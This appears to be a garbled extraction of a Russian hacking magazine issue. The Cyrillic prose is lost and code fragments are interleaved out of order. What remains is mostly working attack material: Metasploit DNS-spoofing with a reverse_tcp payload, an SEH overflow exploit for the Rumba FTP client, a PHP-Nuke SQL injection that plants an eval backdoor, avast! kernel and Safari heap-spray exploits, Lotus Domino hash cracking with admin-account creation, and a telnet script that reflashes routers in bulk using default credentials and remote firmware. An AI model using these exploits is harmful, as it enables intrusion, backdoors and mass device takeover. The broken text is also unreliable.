Jabber'.

gpg --gen-key.
,
, (

OTR-
), ,
, e-mail,
. ,
.
gpg --list-keys

. ,
,
: gpg --armor --export ID_ >
mykey_gpg.asc. mykey_gpg.asc
- :
pub 1024D/29D59819 06.06.2010
myaccount's key (myaccount's key)
<myaccount@Gmail.com>
Primary key fingerprint:
586C 0FAB 3F0C 0009 40C6 273E
8885 6A80 29D5 9819
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.9 (MingW32) WinPT 1.4.3
Charset: UTF-8
mQGiBEwLWjwRBACT9pHfYBDC51cxwsIWuO
5DE7xKBz/NscI05q7j+DaVl0PoXLko
[]
D1cedORKLsgnRfbfkIMAn2BDxiBT2hPvEn
AFjHOpIWra8axQ
=l7zo
-----END PGP PUBLIC KEY BLOCK-----

- ,
.

, GUI-
WinPT (winpt.gnupt.de),
10
. ? . Psi
,
GnuPG (, -
).
,
OpenPGP
.


. ,

PGP/GPG-

GTalk-
GPG-

SILC

, ,
, - .


Psi,
OpenPGP. WinPK .
, Psi
,
, .
, , ,
.
, , .


.

SILC Secure
Internet Live Conferencing (silcnet.org). SILC
IRC: , , .
, ,
, ,
IRC. IRC .
,
. : , , . SILC IRC,
( , )

. ,
, ,
. , .
,
detaching: , . IRC
- BNC :).
SILC ,
,
Linux/Unix/Mac/Windows.
Pidgin . ( ./configure&make&make install)
rpm- (rpm i silc-server-1.1-0.
fc8.i386.rpm). , , ,
:

HTTP://WWW
links


OTR:
www.cypherpunks.ca/
otr/otr-codecon.pdf

WARNING

warning

.
,
,
.

.

silcd -C /etc/silcd --identifier="UN=<username>, HN=<hostname or IP>, RN=<real name>, E=<email>, O=<organization>, C=<country>"

, ,
Pidgin',
SILC.
, ,
IP ,
. ,
. ... ,
IRC, . z



GreenDog agrrrdog@gmail.com

Easy Hack
1

: -

:
Hack In The Box 2010 Dubai ,
Laurent Oudot,
web. conference.hitb.org/
hitbsecconf2010dxb/materials.
,
, . ,
web-hack, . , , .

. ,
( , ),
.
, , , . 100%
. ,
, , . , -

: PCAP-

:
, ,
, - . ,
, , ,
..
pcap, . tcpreplay.
(, ) pcap-
, - ,
. tcpreplay.synfin.net/wiki/Download,
*nix-. Win ,
.
. , test.pcap
- , :

:
COOKIE

:
, -
, .
, .
, - , ( -). ,


, POST (, ,
), ,
, GET-.
- :).
, . -, , User-Agent
Referer, . , ,
, ,
. -,
, .
GET- , , . -,
base64, , - , , - IDS.
-, ,
, , . ,
, ,
, . , , -
web-.

lanmap i eth0

lanmap eth0. lanmap.png. ,


BackTrack. tcpreplay
pcap- .
tcpreplay --intf1=eth0 test.pcap

pcap-. ,
eth0 ,
. lo. .
, pcap-.
, IP MAC-, ,
- . ...
, .

. ,
. ,
. , .
, .
open-labs.org/ob-session04.tar.gz ( ).
, :
perl getcookie.pl http://example.com USERID 100 > test1.txt

getcookie.pl ;

http://example.com
-; USERID
, test1.txt,
; 100

.

:
perl ob-session.pl < test1.txt


, , ..
, -
fuzzer,
.
, ob-session.pl ,
.

PHP- ()

:
.
- Windows, ,
, , , , , . .
Metasploit.
. ,
,
, ,
, . ,
, .
dns-spoofing. DNS-. ,
DNS-,
IP-.
IP- .
arp-spoofing,
, DNS-.
arp-spoofing , .
arpspoof -i eth0 192.168.0.1,

192.168.0.1 IP , MAC .
echo 1 > /proc/sys/net/ipv4/ip_forward

.

DNS-spoofing. Metasploit fake dns, ,


Digininja, : digininja.
org/metasploit/dns_dhcp.php ( ). ,
, dns.
txt, DNS.
.
:
1.
2. dns_mitm auxiliary/server metasploite

lib dhcp_exhaustion, .
msfconsole.
use auxiliary/server/dns_mitm/dns_mitm
set FILENAME /msf3/modules/auxiliary/server/dns.txt
set REALDNS 192.168.0.1
run -j

, :
dns.txt IP DNS- .
, Windows ,
Metaspoit, MSF Cygwine. ,
C .
dns.txt :
192.168.0.1 google.ru

192.168.0.1 IP , google.com ,
, .
, .
DNS- . ,
:


nslookup digininja.reload 192.168.0.101

192.168.0.101 IP DNS, digininja.reload


dns.txt ( RELOAD MSF).
. .
. meterpreter. , .
.
use exploit/windows/browser/ms10_002_aurora

: GOOGLE-
-

:
Google ( ) , ,
.
.

.
, , .
ghh.sourceforge.net , ,
. , ,
:
1. ;
2. config.php ,
, htdocs ( Apache);
3. , readme.txt, -
htdocs;

set PAYLOAD windows/meterpreter/reverse_tcp


set LPORT 4444
set LHOST 192.168.0.101
set SRVPORT 80
set URIPATH /
exploit

-, . google.ru, ,
.

4. config.php ;
5. RegisterGlobals php.ini, ;
6. -
, , : <a href=http://example.com/
honeypot.php>.</a>, ;
7. index.php config.php
, .

. , .
, , -
, . ,
, - ,
.
, MySQL XMLRPC,
.
,
, ,
hackersforcharity.org/ghdb/.
, .. ,
Google Hacking for Penetration Testers by Johnny Long.


:
, , . . ,
php glype-
, , .

: /

][
. Olly Debugger
. ,
. Immunity Debugger. , ,
Ollydbg 1.10.
Pythona , .
1.73 ( 1.74 -
- ). ,
, Python . .
Peter Van Eeckhoutte aka corelanc0d3r
ImmunityDbg pvefindaddr.
, www.corelan.be:8800/index.php/security/pvefindaddrpy-immunity-debugger-pycommand. 1.32.
:
1. pvefindaddr.py;
2. ImmunityDbg PyCommands.

ImmunityDbg.
!pvefindaddr, (L)oga .
, . .
:
!pvefindaddr j esp user32.dll

jmp, call, push+ret .. user32.dll j.txt.

, ,
example.com:22, 22 . , ,
couldnt connect to host, , .
www2.de.com/index.php.
, , ,
. , -
, ,
sensepost.co.za/labs/tools/pentest/glype. , glype- , GHDB.

offset
.



ActiveX

][ . ESP


ComRaider.
Metasploit.
!pvefindaddr pattern_create 500

SubmintToExpress
arg1="Aa0Aa1AAq3Aq4Aq5Aq"

. ESI 37694136, SEH 6B41316B.


:
!pvefindaddr pattern_offset 37694136 500
!pvefindaddr pattern_offset 6B41316B 500

ESI 260 , SEH 304.


ASLR DEPa:
!pvefindaddr noaslr

dll, ,
. , ,
. z

offset pvefindaddr



, Digital Security dookie@inbox.ru


,
, ,
. - .
, , , ,
.
. , , :
MKD c:\zloba
257 "c:\zloba" directory created

, ,
. .

SOLUTION
. WFTPD FTP.
, .

02

RUMBA
FTP CLIENT

CVE
N/A

01

WFTPD SERVER

CVE
N/A

TARGETS]
* Rumba FTP Client 4.2

BRIEF
, FTP-,
FTP-.
.

TARGETS
*WFTPD Server 3.30

BRIEF
WFTPD Server FTP- Windows (, ).
. FTP-
Cisco, HTC, Serv-U .

.

EXPLOIT
FTP- , , . ,
. ,
../ .

EXPLOIT
FTP-,
, . , , - (
, ,
$pasvip) , . , SEH-
. ,
, SEH-, .
-, . :
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto

MKD ../../../../../ZLOBA
550 You do not have rights to create that subdirectory.


=> 'tcp', Listen => '1' )


or die "Socket Not Created $!\n";

FTP-, .

# ,

if (/LIST/i) {

print

print $data "150 Here comes the directory listing.\r\n"

"################################################\n"
."#

Rumba ftp Client 4.2 PASV BoF (SEH)

."#

By: zombiefx

."#

#\n"

. "226 Directory send OK.\r\n";

#\n"

Listening on port 21 with pasv port of 31337

&senddata( '122', '105' );

#\n"

."################################################\n";

}
}
print "Payload delivered check the client!\n";

# IP

my $pasvip = "127,0,0,1";
#
while ( my $data = $sock->accept() ) {

print "Client Connected!\nAwaiting Ftp commands: \n";


print $data "220 Gangsta Rap Made Me Do It\r\n";

sub senddata {
my $port

= $_[0] * 256 + $_[1];

#
my $pasvsock = IO::Socket::INET->new( LocalPort =>

# FTP

$port, Proto => 'tcp', Listen => '1' );

while (<$data>) {

my $pasvdata = $pasvsock->accept();

print;
print $data "331 Anonymous access allowed\r\n" if (/

# 1351
my $junk

USER/i);
print $data "230-Welcome to N0 M4Ns l4nd.\r\n230 User

= "\x77" x 1351;

# SEH- 0x1006E534
# ftplogic.dll ,

logged in.\r\n" if (/PASS/i);


print $data "215 UNIX Type: L8 \r\n" if (/SYST/i);

#POP EDI/POP ESI/RETN

print $data "257 \"/\" is current directory.\r\n" if (/

#
my $seh = pack( 'V', 0x1006E534 );# located in ftplogic.

PWD/i);
print $data "200 Type set to I.\r\n"

if (/TYPE I/i);

dll

print $data "200 Type set to A.\r\n"

if (/TYPE A/i);

# JMP +0x8,

print $data "214 Syntax: SITE - (site-specific commands)\


r\n"
if (/HELP/i);
#
print $data "227 Entering Passive Mode ($pasvip,122,105)\
r\n"

#
my $nseh = "\xeb\x06\x90\x90";
#, NOP - :
my $nops = "\x90" x 50;
my $calcshell = /* */;

if (/PASV/i);

, .
? , , .
:
"c:\Program Files\PHP\php.exe" nuke.php -t
http://<target_site>

PHP-Nuke -
, cookie:
"c:\Program Files\PHP\php.exe" nuke.php -t
http://<target_site> -c user=MjphZG1pbjo1ZjRkY2MzYjV
hYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6ND
A5Ng==

.
my $payload = $junk . $nseh . $seh . $nops . $calcshell;
print $pasvdata
"-rw-rw-r--

1 1176

1176

1060 Apr 23 23:17


, .. .
, .
, ,
referer:

test.$payload\r\n\r\n";

REFERER: '=(select if(true,sleep(10),0) from nuke_


authors limit 1))-- 1

, , , DEP
.

SOLUTION
, , .
...

03


PHPNUKE

CVE
N/A

TARGETS
* PHP-Nuke 7.0
* PHP-Nuke 8.1
* PHP-Nuke 8.1.35

BRIEF
PHP-Nuke . ,
. (Michael Brooks) , , LFI, SQL-,
, , .
, , phpBB, PHP-Nuke 7.0.
PHP
, - ,

-, .

EXPLOIT
, , . ,
, . PHP-Nuke


cookie ,
, ,
LFI-. , , ( )
.
, AppArmor
Ubuntu.
:
print "Uploading backdoor...\n";
$remote_path=addslashes(addslashes($remote_path."\\
frontend.php"));
$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_
GET["e"])):eval($_GET["e"])';
$http->postdata="chng_uid=".urlencode("' union/**/
select ".$sex->charEncode("<?php").",'".$backdoor."',".$
sex->charEncode("?>").
",'','','','','','','','','','','','','','','' into
outfile '".$remote_path."'-- 1");
$re=$http->send($attack_url."/admin.php?op=modifyUser");
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$
values[1]."&xslogan=".$values[2]."&xstartdate=".$value
s[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_
editor=1&xdisplay_errors=0&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");

charEncode () char()
MySQL. , .
:
$http->postdata="xDefault_Theme=../../../../../../../../
../../../tmp&xoverwrite_theme=0&op=savethemes";
$http->send($attack_url."/admin.php");

/tmp AppArmor.


mov


Safari.

SOLUTION
, PHP-Nuke, , , .

04

AVAST!

CVE
CVE-2008-1625

TARGETS
* avast! 4.7 Professional Edition
* avast! 4.7 Home Edition

BRIEF
(Matteo Memelli) Offensive-Security
avast!. , (Tobias Klein), ,
IOCTL-.
, ,
. , .

EXPLOIT
, , ,
:). aavmker4.sys. , IOCTL , , IOCTL
0xb2d60030, :
mov ecx, 21Ah ;
mov edi, [eax+18h] ; EAX+0x18 ,
rep movsd ; EDI,

,
.
-,
. , EAX
.

eax, [ebp+v38_uc]

, .
, ,
, EAX+0x18
.
.data, IOCTL- 0xb2d6001c. ,
, IOCTL 0xb2d60030,
,
.data . IOCTL 0xb2d60020. ,
syscall.
:
lsas1 = "echo hola | runas /user:administrator cmd.exe
> NUL"
lsas2 = "net use \\\\127.0.0.1 /user:administrator
test > NUL"
. . .
os.system(lsas1)
time.sleep(1)
os.system(lsas2)

- - . 4444, .
:
#, ,
# IOCTL-
read_data_from= struct.pack('L', sysbase+0x2e04)
# , , NOP
r0_address
= struct.pack('L', sysbase+0x23fa)
#
#
# IOCTL 0xb2d6003
# -, NOP,
evil_input
= r0_address*2 + "\x90"*0x102
#- , ring3
4444
evil_input += ring0_migrate + ring0_msr + ring3_
stager + ring3_shellcode
#
evil_input += "\x41"*0x549
# .data ,

# IOCTL
evil_input += read_data_from + "\x42\x42\x42\x42"
# ,
.data
#c IOCTL-.
# IOCTL
#
stor_input
= "\x43\x43\x43\x43"
# , ,
# IOCTL
stor_input += "\x07\xAD\xDE\xD0" # cmp dword ptr
[eax], 0D0DEAD07h
stor_input += "\xBA\xD0\xBA\x10" # cmp dword ptr
[eax+4], 10BAD0BAh
#
stor_input += "\x44\x44\x44\x44"*2


, .

# nt!KeSetEvent,

#,

#
stor_input += read_data_from
#
stor_input += "\x44\x44\x44\x44"
# 0x2300
# ,
# IOCTL
#
#
stor_input += struct.pack('L', sysbase+0x2300) + "\
x45"*414

.
, IOCTL-. read_data_from, stor_input.
- read_data_from, evil_input.
dev_ioctl = kernel32.DeviceIoControl(driver_handle1,
0xb2d6001c, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
dev_ioctl = kernel32.DeviceIoControl(driver_handle1,
0xb2d60030,
evil_input, evil_size, evil_
output,
evil_size,
byref(dwReturn2), None)


IOCTL- 0xb2d60020
syscall c lsass.exe. , - , lsass.exe .

SOLUTION
4.8
.

05


APPLE SAFARI

CVE
N/A

TARGETS
* Apple Safari <= 4.0.5
BRIEF
0day Safari.
(Krystian Kloskowski) . Apple .

EXPLOIT
HTML- c
JavaScript-. parent.close(),
,
-.
- , ,
- . ,
.
window.

open(), HTML .
, . ,
close() ,
prompt()
. parent- ,
Safari ,
,
prompt()
ESI ,
.

CALL ESI.
close()
prompt(), ESI
0x40E00000. -,
0x40E00000.
heap
spray, ,
0x40E00000, -.
, ,
, prompt(),
ALT+F4,
, ,
pwned close()
,
prompt().
:

, permanent-DEP.
, - ,
DEP ASLR. ,
VUPEN
(, ROP),
ASLR ( ),
JIT-SPRAY
,
(
:)). .
, heap spray
(, , ) JIT-SPRAY. ,
. -
,
parent.close() ,
Flash, .
.
JIT-SPRAY
,
, . , heap

spray. Safari
, .
0x40E00000 ,
JIT SPRAY ][, ,
0xXXYY0101, JIT-.
,
, ESI ,
parent().
var buf = make_
buf(unescape('%u0101%u0943'),
38000);


. 0x09430101.
. .

SOLUTION
.
JavaScript- Pop-Up (
Safari ). z

//
function make_buf(payload, len) {
while(payload.length < (
len * 2)) payload += payload;
payload = payload.substring(
0, len);
return payload;
}
var shellcode = // -

/* heap spray */
var a = parent; //
var buf = make_buf("AAAA", 10000);
//
for(var i = 0; i <= 1; i++) { //,

a.prompt(alert);
a.prompt(buf);
a.close();
}

, Safari
permanent-DEP,
. VUPEN


HellMilitia and my Death

D-LINK 500T
, ! ADSL-
.

. ,
, .
IQ

, ,
GNU\Linux,

.
Windows ( Cygwin, ), .

( ).

...

- . , ,
, ,
.
, (, -
:)), Web- , ,
telnet ssh.
(
, , admin:admin). ,
SSH, !
$ ssh admin@192.168.1.1
$ Password:

! BusyBox! ,
, GNU/Linux!
, , ,
, .


, ? , :
# busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod,
chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod,
kill, ln, login, ls, lsmod, mkdir, modprobe,
mount, mv, passwd, ping, ps, pwd, reboot,
rm, rmmod, route, sh, sleep, sync, tar,
test, tftp, touch, true, tty, umount, wget,
whoami, yes

,
. :
# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le (root@xy)
(gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00
CST 2006

: MontaVista , .
.

FTP-
adam2
, ,
.
:
# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
processor              : 0
cpu model              : MIPS 4KEc V4.8
BogoMIPS               : 149.91
wait instruction       : no
microsecond timers     : yes
extra interrupt vector : yes
hardware watchpoint    : yes
VCED exceptions        : not available
VCEI exceptions        : not available

AR7 ,
TexasInstruments. ADSL-
, ADSL1, ADSL2,ADSL2+.
RISC MIPS 4KEc,
175 233 ( : 18
13 ). 2 UART-,
(UART_A) ,
EJTAG-, () Flash-.
.
:
# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

- AR7

, :
# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

, Flash- (/dev/mtdblock)
5 :
mtd0 SquashFs.
, . gzip, LZMA
( ). 4 .
mtd1 MontaVista LZMA
, 600 .
mtd2 Bootloader ADAM2, , FTP- .
. 64 .
mtd3 environment ( ) , /proc/ticfg/
env. /etc/config.xml.
( cm_*, , ) cm_logic.
64 .
mtd4 , .
Web-. ,
, ,
.
( 16 , ADAM2
14 , ), /var,
:
# free
              total         used         free       shared      buffers
Mem:          14276        10452         3824            0

.
: thttpd Web-server; dproxy, DNS
proxy server; ddnsd DNS daemon; pppd...
daemon, PPP, -


, POST- Web-
, Flash-, .
,
.

D-Link ( , GNU/
Linux) GPL,
FTP-.
, ( T-).
, ,
toolchain / .
PATH
bin- toolchain`a:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/<toolchain_path>

, ,
make.

Nmap


. ,
( bridge),
.
cm_*
(
TexasInstruments, D-Link
).
cm_logic ,
; /etc/config.
xml /dev/ticfg (
mtd3).
cm_cli
. ,
.
cm_pc , (, ,
) /etc/progdefs.xml;
.
webcm CGI-, , /etc/
shadow, URL.
http://192.168.1.1/../../../etc/shadow

$ cd DSL/TYLinuxV3/src && make


( ).
TYLinuxV3/images .
, /
TYLinuxV3/src/scripts.
.
,
SSH, scp.
, mc (Midnight Commander) SSH (Panel Shell connection). ,
Web- FTP-. Web-, . thttpd,
, .
, /var (,
, ).

$ thttpd -g -d ~/ForRouter -u user -p 8080


# cd /var
# wget http://192.168.1.2/file

, web-:
# thttpd -g -d /var -u root -p 8080

, ,
.
mc, /var ,
. , ,
, .

, , HelloWorld.
- . :

, thttpd , :
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

. ,
ssh/telnet, Web-.
firmwarecfg Web-.


#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    printf("Mate.Feed.Kill.Repeat.");
    return 0;
}

JTAG

JTAG

( toolchain'
PATH):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

<name>hell</name>
<path>/bin/hell</path>
</program>

JTAG-

$ mksquashfs unpacked_fs my_fs.img -noappend

, /var,
:
# cd /var
# chmod +x hell
# ./hell

... , path
not found. ? cm_pc
, /etc/progdefs.xml.
.

, ,
. ,
SquashFs LZMA. mksquashfs (
), unsquashfs ( ) .
, ,
. LZMA-
, . :

,
.
- , , - grep,
whoami,
UPX.
.

,
/dev/mtdblock/*. ,

:
# cat my_fs.img > /dev/mtdblock/0 && reboot

# cp my_fs.img /dev/mtdblock/0 && reboot

, ,
, .
:

HTTP://WWW
links
,
MIPS ADAM-:
ftp.dlink.ru/pub/ADSL/GPL_source_code/
sensi.org/%7Ealec/mips/adam2_app.tgz
langens.eu/tim/ea/mips_en.php
mrc.uidaho.edu/mrc/people/jff/digital/MIPSir.html
mips.com/products/processors/hard-ipcores/4kec-hard-ipcores/
routertech.org5

# cat /dev/mtdblock/0 > /var/fs.img

.
, :

# hell
Mate.Feed.Kill.Repeat.

! . .
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

,
FuckTheWorld /bin /etc/progdefs.xml.
$ cp hello unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

( <progdefs></progdefs>):
<program>

,
, .
. ADAM2
FTP-. FTP-
IP- ADAM2, /proc/ticfg/
env ( my_ipaddress).
reset,
.
$ ftp 192.168.1.199


UART-
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.

, FTP:
ftp> debug

/ adam2/adam2. .
FTP :
ftp> bin

Flash- :
ftp> quote MEDIA FLSH

, ,
:
ftp> put fs.img "fs.img mtd0"

, , :
ftp> quote REBOOT
ftp> quit

! , , - ,
.
, IP-, ( reset' )
.
, FTP
ADAM2: GETENV SETENV ( ). FTP :
ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp> quit

ADAM2 192.168.1.1:21.
, , FTP .
.
, /proc/ticfg/env,
FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

:
# cat /proc/ticfg/env | grep my_ipaddress
, ,
? -


UART-
, ADAM2? JTAG, ,
EJTAG ( ).
\.
LPT- , 4 . .
, JTAG ,
.
, .
JTAG ,
UrJTAG. . :
jtag> cable parallel 0x378 DLC5
jtag> detect

Flash-:
jtag> detectflash 0x30000000 1

Flash-:
jtag> readmem 0x30000000 0x400000 fullflash.img

():
jtag> flashmem 0x30000000 adam2.img

UART- ( ). UART_A , (
) .
. UART Universal
Asynchronous Receiver/Transmitter (
) .
. TTL: MAX232 COM FT232R
USB.
.
( COM-) 20 .
, .
? USB-
, UART USB.

Webcm
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reboot")
telnet.close()


progdefs.xml vim.

\ . , ,
.
Windows, :). .
?
, /.
DDOS- .
/ , mtd-
, !
,
. ,
/ ... . , ,
Flash- ( ), .
! Qemu AR7! ,
?
- !
. , 1-2 , , ,
10- ,
"cat" "mtd".
. python.
:
, , nmap;
IP-,
telnet \;
: ,
, .
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib,time
SERVER="http://anyhost.com/fs.image"
for addr in open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Password:")

, ,
. /
, . ,

, ,
. ,
/ ,
. , ,
, ,
RDP .
.
Windows,
( )
, .
: ,
, ... , .
.

, : ? , , . ( 8 ),
(hex-, , , ), nmap
.
, .
progdefs.xml. telnet ( , , ),
firewall,
IP- MAC-. firewall
, .
.

, D-Link- AR7, Acorp, NetGear, Linksys, Actionec...


AR7 MontaVista. , ,
toolchain, , .
: / ( , , ). , , , / ...
USB 1.1-,
. USB- ,
Flash-
. ,
, ! z



sh2kerr dsecrg.ru

LOTUS DOMINO

. Oracle
,
Lotus Domino. Domino - ,
, , LDAP, , .

IBM Lotus Domino Server Lotus,



,
.
: , HTTP- .
HTTP-,
.
Lotus Domino 8.5.1
Windows.


, Web- Lotus (Lotus


Domino httpd) Nmap
:
nmap -sV 172.212.13.0/24 -p 80
Nmap scan report for 172.212.13.13
Host is up (0.017s latency).
Not shown: 65533 filtered ports

Lotus
Domino

PORT   STATE SERVICE VERSION
80/tcp open  http    Lotus Domino httpd

,
Lotus, . ,
, Lotus Domino httpd,
: http://servername/homepage.nsf.
, ,
, , .
Google Hack
Lotus- ,
inurl:homepage.nsf.

Lotus. ,
,

,
.

, .
Lotus-
,
. ,

,
. ,
?

.NSF

, Lotus nsf.

. , nsf

. , nsf-
, ,
.
nsf-,
:
/names.nsf
/admin4.nsf
/admin.nsf
/alog.nsf
/domlog.nsf
/catalog.nsf

/certlog.nsf
/dba4.nsf
/homepage.nsf
/log.nsf

, , , dominohunter,
nsf-. , ,
names.nsf.

,
, :
, Lotus
Notes . , ?
!

, ,
. .
1. ,
. ,
, , ,
.
2. ,
,
, ,
.
3. , names.nsf

Lotus Notes, .
0-
. , IE (
) PDF ,
Lotus Notes,
ActiveX- ( , inotes.
dll xforce.iss.net/xforce/xfdb/11339),
.

WARNING
warning
!


!
,



!


, names.nsf.
2005
,
.


Live console

Webadmin.nsf

.
. Hidden HTTPPassword
dspHTTPPassword ( ),
, ,
. ,
!

, .
, .
2007 raptor_dominohash,
, ,
DominoHashBreaker, .
,
,
. ,
,
,
. ,
JohnTheRipper jumbo,
,
, DominoHashBreaker.
, , Lotus :
1. (32 HEX) :

ActiveX
:
:
.
.
:

:
<input name="$dspPasswordDigest" type="hidden" value="F05389C37C850260F278FED23334C172">

2. C (22
G) :
<input name="$dspHTTPPassword" type="hidden"
value="(GFmjA4YmP9C05vHn09gI)">


JohnTheRipper HASH.txt :

./john HASH.txt --format=lotus5


JohnTheRipper HASH2.txt :
:()
:()
.
.
:()


HTTP://WWW
links
dsecrg.ru/pages/
pub/

names nsf

./john HASH.txt --format=dominosec

, , ,
. , ,
Domino ,
Lotus Domino Web-.
, ,
- ,
.

, , ( , :))
.

nsf-, , , . log.nsf,

, , . catalog.
nsf. ,
/mail/.nsf.

webadmin.nsf (servername/webadmin.nsf). Web- Lotus Domino
. , ,
,

.
Lotus Domino ,
, : ( ) (
). , Windows

Local System, Local
System, Unix .
, webadmin.nsf?

,
.
: Quick Console
Live Console. - .
, ,
LOTUS.
, -

, , Load
,
. ,
PATH
Load (
, IBM Lotus Notes/
Domino R7, , Lotus).
.

LIVE CONSOLE


Live Console, , , .
,
,
.

2050,
.
, ,
.

QUICK CONSOLE


Quick Console.
, ,
.
, ,

.
Blind SQL Injection, , .

cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf Lotus Domino.
exploit-db.com/exploits/3302
securiteinfo.com/download/dhb.zip Domino Hash Breaker.
openwall.com/john/ JohnTheRipper
openwall.com/john/contrib/john1.7.5-jumbo-2.diff.gz JohnTheRipper Domino
documents.iss.net/whitepapers/domino.pdf IBM ISS Lotus Domino Security 2002
seclists.org/pentest/2008/May/64 Pentesting Lotus Domino.

,
, ,
. ,
Files, ,
, , . ,
.
.nsf.
,

,
, .nsf.



.
(
):
load cmd /c "dir /D /B > sh2kerr.out"
load cmd /c "FOR /F "delims= " %i IN (sh2kerr.out) DO
ECHO > C:\lotus\domino\sh2kerr\"%i".nsf"

(
DIR) sh2kerr.out.
.
C:\lotus\domino\sh2kerr\ ,
.
, , , .
,
. , ,
Web-.
6.5 8.5 ( , ,
, ). Windows
:
C:\Lotus\Domino\data\domino\html\download\filesets\

, Web, : http://
servername/download/filesets. Lotus.
.
Load . Server->
Status->Schedules->Programs. ,
.

Web- Lotus Domino, (NRPC 1352 ),


.
Lotus Domino , Lotus Designer (), Lotus Notes ( )
Lotus Administrator (, ).
, Lotus Domino
ID.
.



ID-, . , ,
, 2 : ID- . ,
Web, .
, ID-, Lotus Domino.
ID- ,
, . ,
names.nsf, .
ID-
names.nsf. , Web-, ID-.
, ?
. ID-, , ,
, , 3-
(smashingpasswords.com/3-best-lotus-notes-password-recovery-freesoftwares), (IPR) .

STEP BY STEP HOWTO

, Lotus Domino.
:
Web-:
1. raptor_dominohash :
./raptor_dominohash 192.168.0.202
2. , ;
3. JohnTheRipper :
./john HASH.txt --format=lotus5
4.
Web- :
http://servername/webadmin.nsf
5. Quick Console ,
:
load cmd /c net user hacker iamstupid /add
6. , , :
load cmd /c net user > C:\Lotus\Domino\data\domino\html\download\
filesets\1.txt

:
http://servername/download/filesets/1.txt , , ,
;
7. , Program.
NRPC-:
1. names.nsf ( ) ID;
2. ID
;
3. Lotus
Administrator, 5 .


Lotus
Domino. , : ID-,
nsf- xss Web-,
, ,
.
, , DSecRG.ru, ,
, (research@dsec.ru). z


Positive Technologies

MOD_REWRITE


...
, MOD_REWRITE
C , ,
Apache mod_rewrite.
- ,
SQL Injection, Cross-Site Scripting ..
, , fingerprint-
. , mod_rewrite
, ,
. , , ,
!

Mod_rewrite URL . -
Apache .
:
(SEO);
, ;
, -
;
: mod_rewrite
HTTP-, COOKIE
( )
.
mod_rewrite -.
:
1. URL. , http://www.example.com/main/
search/stroka_poiska, , URL
-;
,
. -.

/main/ -,
search=stroka_poiska

RewriteRule ^(.+)/(.+)$ script.php?act=$1&value=$2


script.php, main
act=search&value=stroka_poiska
RewriteRule ^(.+)/(.+)/(.+)$ $1.php?value1=$2&value2=$3


main.php, -
value1=search&value2=stroka_poiska
, mod_rewrite
, URL-
. , :
RewriteRule ^(.+)/(.+)$ script1.php?value1=$2&value2=$3
RewriteRule ^(.+)/(.+)/(.+)$ script2.php?value1=$2&value2=$3

-:

RewriteRule ^search/(.+)$ search.php?search=$1

http://www.example.com/stroka1/stroka2
http://www.example.com/stroka1/stroka2/stroka3

http://www.example.com/main/search/stroka_

2. , -

poiska search.php,

. http://www.example.com/main/articles/statya.html

( 3 )

( )

PHP, ASP Perl,


HTML;

3. ,
mod_rewrite,
( );
4.
(, (/) %2F (hexadecimal
encoding) %252F (double encoding)),
URL- mod_rewrite.
mod_rewrite,
. ,
, Security Through Obscurity,
.

mod_rewrite
(brute-force),
, (rewrite rules) mod_rewrite.
:
( URL (
- Apache 2.x 8192 , IIS
16 384 );
() ;
(
) id, count, ..
( );
( );
(
).
-
mod_rewrite.
1. .
,
index.php, main.php. ,
(, 404 Not Found).
URL-,
-, http://www.example.com/index.php
(RewriteRule ^(.+)$ script.
php?$1). .


2. , .
-
, id, file .. ,
:
(id, path, page, debug, cat
.);
(1-5 ) [a-z0-9_] ;
:
"" + " ";
" " + "";
" " + " (_,-)" + "
";
" " + " (_,-)"
+ " ".
, ;
- (param[]).

, :
, PHP- ,
(http://example.com/index.php?param[]=value),
, (
error_reporting level), .
:
GLOBALS (http://example.com/index.php?GLOBALS[var]=
value);
_SERVER (
);
zend_hash_key (
unset()).
3. .

. , , 1,
,
, . .
( XSS, Local File Including, Path
Traversal, etc),
.
, , :
